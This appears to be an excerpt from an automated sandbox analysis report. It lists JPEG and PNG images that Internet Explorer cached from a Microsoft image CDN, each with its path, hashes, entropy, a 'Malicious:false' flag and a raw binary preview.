                                                                                                                                                                                                              SSDEEP:96:HapWkbW7evEvv3cGFFTCjdAbu8XWPWlX5fMUKwAiSVS1VSGwa/YjdU:HapTbSevKvMGH+jjPSEjwfSMyTawjW
                                                                                                                                                                                                              MD5:54C1F9B9D5FF7DBAE36703FD450D6726
                                                                                                                                                                                                              SHA1:B3B2AB020DD99ADBC5DDC79F87A3C8EF9FE395DC
                                                                                                                                                                                                              SHA-256:2E64F07DFF76824E7E669552B4747FED5D4ACBBABD3BD37AF15A22FF3465CD6A
                                                                                                                                                                                                              SHA-512:78E78755B2ABCBCEAF029DE997EA44D5554C68ACAA40C7B8BF045D902455042437A05FEA60141DB0361C1B84BD9E7A2BF3713DB95AC815BDDC1FA2742DA16C7C
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              IE Cache URL:https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4E4rR?ver=1daf&q=90&m=6&h=157&w=279&b=%23FFFFFFFF&l=f&o=t&aim=true
                                                                                                                                                                                                              Preview: ......JFIF.....%.%.................................................................&$&22C...........................................................&$&22C...........".................................................0.......J......5...........9?W..........-.9..N.......iqJ[K/.....?...o...k-..XUm..t........;:x...>...u..dh..X;...r]'.89.~.]v.L..i..YKel|....=S..O%.{_.jt..D..7W...^..........3..7.MTi.3..S......Q.=..#^.....).......]&.%M.:w...o.t...i.^........05.....y..&L(....^S....H...B.[...u...i...s&g.....U....w.R..&....qJ[e.."?C._.z.=...G.a......6k....b.......~........$.e.@..Lx`........'5...Y...c.j5..._P.R.Yf..,..FJ..Yx....T......Z..................................................."...?Z9Mwy...'..O;.~t.....:..i...'.v:...L3{..#.u./2...r.l*.&......................................................yL...0.z...5.e[x....M.f......>.$4..v.r>{.S....@+.BEs|.u.*................@.........................!.1A.."Qa.2Bq..0... #@Rbr..$3....%PS.........?....d~..f.Ie.|...B>=
                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\RE4GMgj[1].jpg
                                                                                                                                                                                                              Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                              File Type:JPEG image data, JFIF standard 1.01, resolution (DPCM), density 37x37, segment length 16, progressive, precision 8, 279x157, frames 3
                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                              Size (bytes):3244
                                                                                                                                                                                                              Entropy (8bit):7.688115543315869
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:48:Eg5i5GBjPFu/gpNhYQIeItsjUXMv80YpQQRqhvpP9X7QKPbWWuoFG9L6GMOcJfm1:a5+jPFu/g9gbA87mP90/cJOm/FbyBDR
                                                                                                                                                                                                              MD5:33B7B81B3F47080B08AA0D148D30B9E8
                                                                                                                                                                                                              SHA1:6FC6E9ADF20CC47CC6F80498CE5A62CD1F1138C4
                                                                                                                                                                                                              SHA-256:8A2085E960A9694A7B8569462560E2C309AD10FDE33A6CD4171CCDD164795DFC
                                                                                                                                                                                                              SHA-512:8D519D85DBC615D96224CE6ADC958F75BD89C98BBD37FE9BC4AC496AB07BBB683A4BE145307BA1629135FBBD52E52F0FBF64A4309F4B67E0821F70A123699B5D
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              IE Cache URL:https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4GMgj?ver=bbbd&q=90&m=6&h=157&w=279&b=%23FFFFFFFF&l=f&o=t&aim=true
                                                                                                                                                                                                              Preview: ......JFIF.....%.%......................................................................*................................................................*..........."..................................................@...............N ...*.....Y....][c...`..5.....|.|.7....fp.......w..oi....<.kG......@...X.z..m...^..........Er........j.4NX?|......G.J....g.K.U...w .`.....E.(...;...e.....Z...{..............'z..\.Z.9>.....o.....f.q.....k.....jd.7.....................................................$.........j@.s..........................................................m..K@...............F...........................1...!A.."&2@Qq..Bart....#6CD`bs.....PRcu.........?.....F..z..........%...6.4u........KI....`.u..n.8.9..Z~M.... ....{.p....mq).U....;q..N.v...i..<.uK=.Q...T....ZP....A)JR5*Q=@..go....Z..o+..^r...=$....1.R.$...'.....2..<.....V.g.......1....b.a..ng[0/....Y.e....^b..4....u....C.\.m.....,S.:.BP. ...^..s.7%.R.f]2gW.R.Hu.P.h....H..).H..~./;gA..~..:..q...V
                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\RE4Geme[1].jpg
                                                                                                                                                                                                              Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                              File Type:JPEG image data, JFIF standard 1.01, resolution (DPCM), density 37x37, segment length 16, progressive, precision 8, 279x157, frames 3
                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                              Size (bytes):3526
                                                                                                                                                                                                              Entropy (8bit):7.72810481100534
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:48:XtMeOB8mZDHtPwZQrTg+NWV7XaiA4kbna5pVI3uVVKEnLghDoJy:XtMeOKm3wZ2Us074napVI33oY
                                                                                                                                                                                                              MD5:EF0102F4E5F5DF10934FF8CC82FA014F
                                                                                                                                                                                                              SHA1:C293C4EC550D448BAED8E4C57285ADABD0958E61
                                                                                                                                                                                                              SHA-256:09A570B3A07709A14D837C4702CFFFA6DF2B5A9B8BF49DE9BEB505E9B1855CF7
                                                                                                                                                                                                              SHA-512:41D7B6A89AE46FF832F0129A0D559122EDBF17B3E04147436FB5613539694F813258A8B67DF61BDC04CC809C521A72C982DD9DC7763C3A15FCC18FBD63246D21
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              IE Cache URL:https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4Geme?ver=3100&q=90&m=6&h=157&w=279&b=%23FFFFFFFF&l=f&o=t&aim=true
                                                                                                                                                                                                              Preview: ......JFIF.....%.%.............................................................".."+)+88K.......................................................".."+)+88K..........."...........................................................................i.e?@...^..}}}{S.......g8g.+.zJB.\......X...?;5)[.w`....;%n..yJ................F......C.m.g.`o|..0...s.7e.~.P.@Y._.o......J....9.C..m0..,..VTUU.].....w/.......0../=p....e........s.p...{.."....................................................................>r.....x....._'..`....-........0..r...................................................S;...9t.r...)p-..N...._D.G......K.t*^....X......E...........................!1..Aa@Qq...."2Br....3Rs...#...4ST`bcp..........?....A*=.>.(P.)....rCH.....?...`K..sX..)...e.d....Yq!H[j.B....1.[....y.`..nW@._...[..K..o..#+X...'.....m.}.C.....[..f...?r44.`.....z.[......A[.7...e.H...+..L..i.rU..2.Ck...rubW..n...Ml..9...'.*W..z....so2.Is..CA.....<G..5..u.l.j.|.S/OKk.,.9..M....7...=g.....
                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\RE4IFwr[1].png
                                                                                                                                                                                                              Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                              File Type:PNG image data, 48 x 48, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                              Size (bytes):2095
                                                                                                                                                                                                              Entropy (8bit):7.892535036334126
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:48:n7DTGrnxm2Tgx35YzPaAdjQLhp4/mFhFd58cckOhb:n7DyNmyk5YOQe4sXnk
                                                                                                                                                                                                              MD5:FFB9838EB01E7B757B2C129326F88B66
                                                                                                                                                                                                              SHA1:FA31BAD7F5856E4F7BE7FAA63C560DD773D3C2AA
                                                                                                                                                                                                              SHA-256:2B75AE88297984C6000B63A63904375BC06D53C75407990998EA55BB71FA35C6
                                                                                                                                                                                                              SHA-512:A5555D299E3477C126FBB9ED80D6247C4D082CB46A80547562AA0597066F18B31078B1342872362F876B949E8165BC195057A6E6086E2D6F0987DCF7FBF39348
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              IE Cache URL:https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4IFwr?ver=70f5&q=90&m=6&h=48&w=48&b=%23FFFFFFFF&l=f&o=t&aim=true
                                                                                                                                                                                                              Preview: .PNG........IHDR...0...0.....W.......orNT..w.....IDATh...PU...m.:......45.....(b41i....t:iZ...`.h... C.A0..h.\"......j ...=.........GX.b..........}s...9.{wyS.L..............g....<...-.~.....{lvQ..Ux.ZKK.........o..~....z.GD||..~.y.R.."...'....|p.....Q.1.ZMh&..(W.!g.0..0...@....X,.....z..o.K..Gx.L...B.PC..A..B}..M..W..D&.......*b...XW!......cI...5t.~+..f.L..g4A.R........K%x...D...,....2X.A.`.Q.}F...G@..x.D.W.c)....26}......s:....s.6.^....<.8.."1.Q...e..{\N<[(...ZX(u4z...F.GG...Zo.L...t3..M.E%.a~].....a...,.T.?G...[.>..t...,....g.()..c.....5R.O......B1..K..ba....W".X.....wF.Ro..h0C..#.....!!...M..Qs}......@.f.. .....Jd.....2o!...q.....\..j...B..~....(mL.vvM........w..~U..$b4O.)..../.....".5djf..........G.d<E .]..N..u..L...O.+Fs..r...%..j.Jf\.P..G@L.../..v.}\...../..#.@.7.Wk.XE)BN..x..%.I@T....m.....N.-6...d.6."...QV.....dZr.D(.a.."../...r.}U...[6...r...g.m.3.p?R..}...(..[..bQ-.:3.....n....1K.X.+..>....x5<N}.....E}..7..O.{.7..$.=.....p....Z..#..
                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\RE4IqHN[1].png
                                                                                                                                                                                                              Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                              File Type:PNG image data, 48 x 48, 8-bit colormap, non-interlaced
                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                              Size (bytes):1244
                                                                                                                                                                                                              Entropy (8bit):6.156544726495239
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:12:6v/7+Fpz/1ZBLAsgOKPiE5LbWp6LZYdUpzxa/3mdaPb6My/llTz8hOtTVL56HrM7:t5jgOKV5LbWGzkZb6zjMOtTVVOY7
                                                                                                                                                                                                              MD5:E176B91BEE1DAF7782C50ECC75F6A68E
                                                                                                                                                                                                              SHA1:7DC632568FB1A6BC20C78F818D2336FE8A3C4D6B
                                                                                                                                                                                                              SHA-256:130311CE31EC65DA65FC967ED6DAD4BD080E77DCFEBA642F4DDFA284BFDA8283
                                                                                                                                                                                                              SHA-512:DAD60EF47E9554C4C3EE8A36F4C0C86212DED9828C9CF09F859BB9A625DBE806B742D924E14F5BD122BABC98A7D1755A9DBCC2EF2CAB1D7B8A78EC9C0B2817A7
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              IE Cache URL:https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4IqHN?ver=7a6d&q=90&m=6&h=48&w=48&b=%23FFFFFFFF&l=f&o=t&aim=true
                                                                                                                                                                                                              Preview: .PNG........IHDR...0...0.....`.......PLTE...{.]{.]{.]{.]{.]{.]{.]{.]{.]{.]{.]{.]{.]{.]{.]{.]{.]{.]{.]{.]{.]{.]{.]{.]{.]{.]{.]{.]{.]{.]{.]{.]{.]{.]{.]{.]{.]{.]{.]{.]{.]{.]{.]{.]{.]{.]{.]{.]{.]{.]{.]{.]{.]{.]{.]{.]{.]{.]{.]{.]{.]{.]{.]{.]{.]{.]{.]{.]{.]{.]{.]{.]{.]{.]{.]{.]{.]{.]{.]{.]{.]{.]{.]{.]{.]{.]{.]{.]{.]{.]{.]{.]{.]{.]{.]{.]{.]{.]{.]{.]{.]{.]{.]{.]{.]{.]{.]{.]{.]{.]{.]{.]{.]{.]{.]{.]{.]{.]{.]{.]{.]{.]{.]{.]{.]{.]{.]{.]{.]{.]{.]{.]{.]{.]{.]{.]{.]{.]{.]{.]{.]{.]{.]{.]{.]{.]{.]{.]{.]{.]{.]{.]{.]{.]{.]{.]{.]{.]{.]{.]{.]{.]1__.....tRNS......&.. p.u...6.;V`X@.."P.i....r.s.z.......:0..*....H..e...3...In.C|...Tt...L.....[..F...{'.R.,.$..%9......#...Y.O..(.W)......-!E.j.7.x28m4M>..DJ....?..5.+...v....orNT..w.....IDATH.c`@..L.|.f............_...7.....z.>~...A!a.Q1qF.f.IB....ed........2A.*........l.44..ut..._d`h..Sol"`jf.G...EV...0.R..6.l.p..w.*rtrv.iPpus_.......E.7...qh.........E..5X.R.(...@....kP....<B.(.a......Q..u.'.{.uh.<...............dr.D.g2H,.!....L0...........P .....
                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\RE4IvNB[1].png
                                                                                                                                                                                                              Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                              File Type:PNG image data, 48 x 48, 8-bit colormap, non-interlaced
                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                              Size (bytes):610
                                                                                                                                                                                                              Entropy (8bit):5.947685564668817
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:12:6v/7+nmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmV:DqYybOo1bfMoM4
                                                                                                                                                                                                              MD5:33C901E6934C5795177442806CF4A8A3
                                                                                                                                                                                                              SHA1:4AE7AFB7BF9B8FBBE67633E32260FF0A6BF8E0AA
                                                                                                                                                                                                              SHA-256:275FB148A90BC1E78D67CD89475F4A4BA74A5F34F8C96AB80E43458CCFE3F611
                                                                                                                                                                                                              SHA-512:84FBDD3BD77DD847C161C0B40C17D2D8FBD2D7989C26B7B7B205E29FB694F7C39BEB18577B8244427EC76E1685C9F81D4D2C042DC830C0A2C4935C699E4CE095
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              IE Cache URL:https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4IvNB?ver=0be0&q=90&m=6&h=48&w=48&b=%23FFFFFFFF&l=f&o=t&aim=true
                                                                                                                                                                                                              Preview: .PNG........IHDR...0...0.....`.......PLTE...$z.$z.$z.$z.$z.$z.$z.$z.$z.$z.$z.$z.$z.$z.$z.$z.$z.$z.$z.$z.$z.$z.$z.$z.$z.$z.$z.$z.$z.$z.$z.$z.$z.$z.$z.$z.$z.$z.$z.$z.$z.$z.$z.$z.$z.$z.$z.$z.$z.$z.$z.$z.$z.$z.$z.$z.$z.$z.$z.$z.$z.$z.$z.$z.$z.$z.$z.$z.$z.$z.$z.$z.$z.$z.$z.$z...fw...LtRNS.."..&=\.....+.)Fc......,.*Jk.........3.h...8Sr...f....:[{.........-g.twvy.B........orNT..w.....IDATH.c` .021..............B>.~.A!a.Q1.0.....YRJZFVN^AQ...(cjPQUSg`..TP....4h1k.....h...10..`. .&.f...V.6.vPQA..{.......QE.kp...AByT...h...\...qh.qfpus.@..^.......+....N"..iiT..s..+...,.+Er.].+vr...6N0.?.|..Z..j.....IEND.B`.
                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\RE4Lp94[1].jpg
                                                                                                                                                                                                              Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                              File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, baseline, precision 8, 1600x600, frames 3
                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                              Size (bytes):44692
                                                                                                                                                                                                              Entropy (8bit):6.30917960694282
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:384:ex5U9bF9AHu0u0/s5SqrBXr5zBQ1Wh9qR074U1E9oBm+wZkitT:esYu7005RrB75zBKj+gqwZkiV
                                                                                                                                                                                                              MD5:884D2EA1155D3E35EA7781307D431FD2
                                                                                                                                                                                                              SHA1:FB59804B349530839C449BC31F0061B5A9BFC9A0
                                                                                                                                                                                                              SHA-256:7EFAB79CEDAE442F8AF4137454D96596815BC2D58FECFE5C57110FBB2D323908
                                                                                                                                                                                                              SHA-512:D10ABEF39F76761F697B8B8B557FD2EE9D41F9577749F43609457FF10B7451C9145BE896689144DDC40CD765A431E6C5DC20ECD4143B78583C61E99BB1727BEB
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              IE Cache URL:https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4Lp94?ver=b6a0&q=0&m=8&h=600&w=1600&b=%23FFFFFFFF&l=f&x=0&y=201&s=2120&d=795&aim=true
                                                                                                                                                                                                              Preview: ......JFIF.....`.`......................................... $.' ",#..(7),01444.'9=82<.342...........2!.!22222222222222222222222222222222222222222222222222......X.@...........................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz......................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?..j.(......(......(......(......(......(......(......(......(......(......(......(......(......(......(......(......(......(......(......(......(......(......(......(......(......(......(......(......(......(......(......(......(......(......(......(......(......(......(......(......(......(......(......(......(......(......(......(......(......(......(......(......(......(......(......(....
                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\RE4LtGU[1].jpg
                                                                                                                                                                                                              Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                              File Type:JPEG image data, JFIF standard 1.01, resolution (DPCM), density 37x37, segment length 16, progressive, precision 8, 380x214, frames 3
                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                              Size (bytes):8201
                                                                                                                                                                                                              Entropy (8bit):7.882571791198044
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:192:+4KjkNmKZvcszQKthJKe6IZeCrAbLHwVPr8mszrR:+RjsmKZdsKthJfGCkHnxJ
                                                                                                                                                                                                              MD5:C63DAACF2181E43A1D9F9C32F0EA3BC3
                                                                                                                                                                                                              SHA1:5413FBC664583E723A55F4AAD4D948BB06376D24
                                                                                                                                                                                                              SHA-256:9E5658498FADEB00CEB667D3EA669EF482194F792442602FCC0C11F9BB8F3693
                                                                                                                                                                                                              SHA-512:E591F80FDD3A2D344BCADA31A6CD0E5D84BF44BB531FF7BE16298E5249F022B83387264392B7592A933CC7937377419BC143743209AFBD6CE5AB4B29DAA27FC3
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              IE Cache URL:https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4LtGU?ver=1d83&q=90&m=6&h=214&w=380&b=%23FFFFFFFF&l=f&o=t&aim=true
                                                                                                                                                                                                              Preview: ......JFIF.....%.%.................................................................&$&22C...........................................................&$&22C........|.."...........................................................................1.E..B....e....6..{..q.d[.rcv.Iw....7U~.>.....^...[=..zw..\.}g.Z/8y........w....U_.c....y../....zS.=......8.z..2.m......1..O...{.I@......].0....o.".Wc.-.........xS...6....[..d.u.....M..v.P.........~Xn...MX>..o.,..4........c..I...,.]I.d...Yz.......i..).Yi...#Y.....[.`....k.-KM5fW............{.....<..q;<..j.ie..AZ..........,...Y#.Iw..}....$._:..O..4f.y.2...\.....r....P.Q.'Fh........Ls[Fb...o..M....[...?X.......5..j...c........._@..><..f!e.W....}jk+n}C.P...).Z.k...c....B.................q....................?...............................................<=5.....=]..*.D.M(.-z.V..dy<. .,z...|.5.w#N..........9...v.'X...Q.....d..c..6...........................................................e._....G7}o.....|P.........`...
                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\RE4dKxE[1].jpg
                                                                                                                                                                                                              Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                              File Type:JPEG image data, JFIF standard 1.01, resolution (DPCM), density 37x37, segment length 16, progressive, precision 8, 380x214, frames 3
                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                              Size (bytes):7645
                                                                                                                                                                                                              Entropy (8bit):7.8541086513863885
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:192:viGIq0ceZC0EHInsPFGONkl9gBfSbMEaR1P+x2WyIfvpLO:b+jZCPosPFGOGlJbJA2GIfvpLO
                                                                                                                                                                                                              MD5:8E06ED60E5D71391C3D23C19A75AF760
                                                                                                                                                                                                              SHA1:68D6C08F32DF42BCA2829DF9490C45FDE82855D7
                                                                                                                                                                                                              SHA-256:1E6CF55E91DA2B6BBEC6E3787E6E25CE3AF9DEBE421A87F93D3926B5EF00E746
                                                                                                                                                                                                              SHA-512:0504EFCB00419B5D58F2B2B22920300E03A645D25EA33B79D81C69267B60E63D7BA8A78BF1CF9945DDA1B61148850F8916DC4FE1AAA63C85843411CC6F6F6E31
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              IE Cache URL:https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4dKxE?ver=60a5&q=90&m=6&h=214&w=380&b=%23FFFFFFFF&l=f&o=t&aim=true
                                                                                                                                                                                                              Preview: ......JFIF.....%.%....................................................................%%2..............................................................%%2........|.."..................................................@...................................... ...\........s.{5.+.....F.8.ouP....6......L.....M............*.Vy...{......Q.1.ox........@*.u.9.....T...6>.YJ.c...Hr.+..v..it....0...kB..n..m../K..x.7G.M.l....+.+....}.X...%yi'..)u.B....O.".#..?O.7.l...y.q.Z.V..A........d.....&......>C.X.......JS.x<.=.....L....<b0..-......................................?.................................................)bM....yn.n.p...k.v=Kd......d....S..*}..!<....l....x....N.m....Q............?.................................................+...>.....%E..z..9........i.{{.m....@.p.....+ov...ptD......9...=....F.+0.............1..........................P....WX...!.15@....8V.................*..f\Q..O}..I.......C..."t."..C*..D.....k ......T.(...3!qQ.?F.:....Gg\5G.J...b.c`.~...\tB.%.
                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\RE4pxBu[1].png
                                                                                                                                                                                                              Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                              File Type:PNG image data, 40 x 40, 8-bit gray+alpha, non-interlaced
                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                              Size (bytes):592
                                                                                                                                                                                                              Entropy (8bit):7.5191542877143895
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:12:6v/7PoNuMxRUHNV7ROerL/EmNsgF8wUy+cghBZ+QXe0q1cg+SR:+o0M7cbUen/d8BZxcKg1R
                                                                                                                                                                                                              MD5:E8DCCE76EF06E598B2FFEDB2D2DF92C3
                                                                                                                                                                                                              SHA1:652895F799FCBACA551EC5911A88895DB90EE693
                                                                                                                                                                                                              SHA-256:BD58174AB1A620975F07510EC6480E6C2D97E84FEB5D8647873E172908942651
                                                                                                                                                                                                              SHA-512:1467EB0690B8747F28098B2032662C0014B2CEB647113DE40D99AA5F0F53D214F607392A09833BF41F91D8691A228239537A08860C1C3B31C3D90F6CB708A0C9
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              IE Cache URL:https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4pxBu?ver=eae5&q=90&m=6&h=40&w=40&b=%23FFFFFFFF&l=f&o=t&aim=true
                                                                                                                                                                                                              Preview: .PNG........IHDR...(...(.....&.p.....orNT..w.....IDATH.V].. ...D0...@.#...D ...@."........^x.x.qwf........a.q`.?..........l...Gxh..{.......`,.l...E2..B,.......SF.c|T0.x.5c..."..[A..l.....2.^_...jz.>.....<..m...|A.8..H._f..;[....I..CN...$d...n..J...pGFfST..|..4...5..9...?Q#2..f".W;... ........a.^.[2i..4..c... >."$....i.g.).+V.....d.x...h.I|ta3...\...R..OQ....l...T.|..C.*....].;..>..c..P.z.V...r....zbmB.....(.|..e-.?..0Yr.h.....p..w.>+/....e.... JS....U...H...l..?...E.4.}.;....M.c.{....'9..!8.DOA."(..Q.q....- ..Q5....kO75m..Wn...w.U........r....,.D.z.....IEND.B`.
                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\RE4qU6q[1].png
                                                                                                                                                                                                              Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                              File Type:PNG image data, 47 x 40, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                              Size (bytes):1574
                                                                                                                                                                                                              Entropy (8bit):7.805404668945285
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:24:6gTrHE73tcUxgaOK2NXHbQ4XKzo08x+tBgpV/TRajnKqK6zc0bIouc/XQuHfbB:R7EjttUX38I0fApRd0nc6zc0mcoQB
                                                                                                                                                                                                              MD5:45794016DAD729E18F72C2DF007216A4
                                                                                                                                                                                                              SHA1:6B617D457FDE4FFBC1B25BA280A5DF70B728FEEC
                                                                                                                                                                                                              SHA-256:1DCBE5E67A5E8BBA355D3CA78EA8CD1C0DCBCFAA1CC7D5BCFABCB39078F1138C
                                                                                                                                                                                                              SHA-512:F31AE156E41100E205FCA19C10F85595BE1D60B606901DB431B0206B19C6F6486926F8CAD33D836E5CF4118FF2346407A04EEF2D29300386707D9046A60CFDDD
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              IE Cache URL:https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4qU6q?ver=b2f2&q=90&h=40&b=%23FFFFFFFF&aim=true
                                                                                                                                                                                                              Preview: .PNG........IHDR.../...(.....n"......pHYs..........+......IDATx..kl.U..w...*.B.Z."j.>........h.H.......6..G.>..[Z...B.R.b........l.TcD..`i.J.P...w....3kwe.I.{..{.9.s.;w...H...U.}.<.:.....c.JR.C..v.Z m..`9c.P(.^^^.G.7.?I!...."...1x.......V%..1........|.=MD!..t<..1......;.N..&...W.....z+q...<^..1.D#XM%$.]$..awB.....Z...+..Z.X...H...N.8au.%.l.K).S8]....<....m.k$.b..--.0...<.rY......5f.0^....)Ix..E.'...$....j&....d..,$.68.D...'..h...1...j..}}..yx..s..D....SRRrJ..&......t..y..M.!.n0..JH.{I....^.....|n.o'I..^V..>.n...]. .18..\...J2.D......t.....}...)=..x.V.N+.t..(\...>..DO>.^.2r...8.....$....5.4}a.W....|.~.....T..........-^0=......{EEE..G.XK.r.Z..H..$[.E..Z.y.s=ym..2.@ .1...NH......p......-..W..D......x<.~.?|QR*!.I.R..c .p..._.u.f|..7#.l...iT[K.Y.oqq..I.........B.(.i=.G.,`&B..4)...q;..T.G.+.A.|QQQ...1......p..........$.E....X~.N.......5!.m<H.e.2........4...XA..r.....r."...4.D..$..c.$Q..$..R.)..6c.-Z.H./.Z%.o.|$..r\.....RF..rd>/I@..v.I...J.C....=..K
                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\RE4qVml[1].png
                                                                                                                                                                                                              Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                              File Type:PNG image data, 39 x 40, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                              Size (bytes):1243
                                                                                                                                                                                                              Entropy (8bit):7.792042274952425
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:24:QB1+Mz/r3gUlbRkhcmCca73WZDHnPXkdmABna4TcDrDDE:Q3+Cr3g89khcrcqmxPXkdmynTeDE
                                                                                                                                                                                                              MD5:36C8770A919FCC31ECB0FCA65A75CAE4
                                                                                                                                                                                                              SHA1:E83BC2C48DF3B05D094C96BF55D175DE716ED80B
                                                                                                                                                                                                              SHA-256:B0CCD542B44F6A05F6462E3E08C669BCC65C4D0FFAE26A9D2FC8BBE7BF1DB9EC
                                                                                                                                                                                                              SHA-512:5FD133D35D082F586EAF8F0332B2761C9DB955350ED5609E9C158AB52D70847172382E0E65560F45F3DBE169D5933DB945887D50B1B17030D3D5B51E36D4D5B0
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              IE Cache URL:https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4qVml?ver=3f68&q=90&h=40&b=%23FFFFFFFF&aim=true
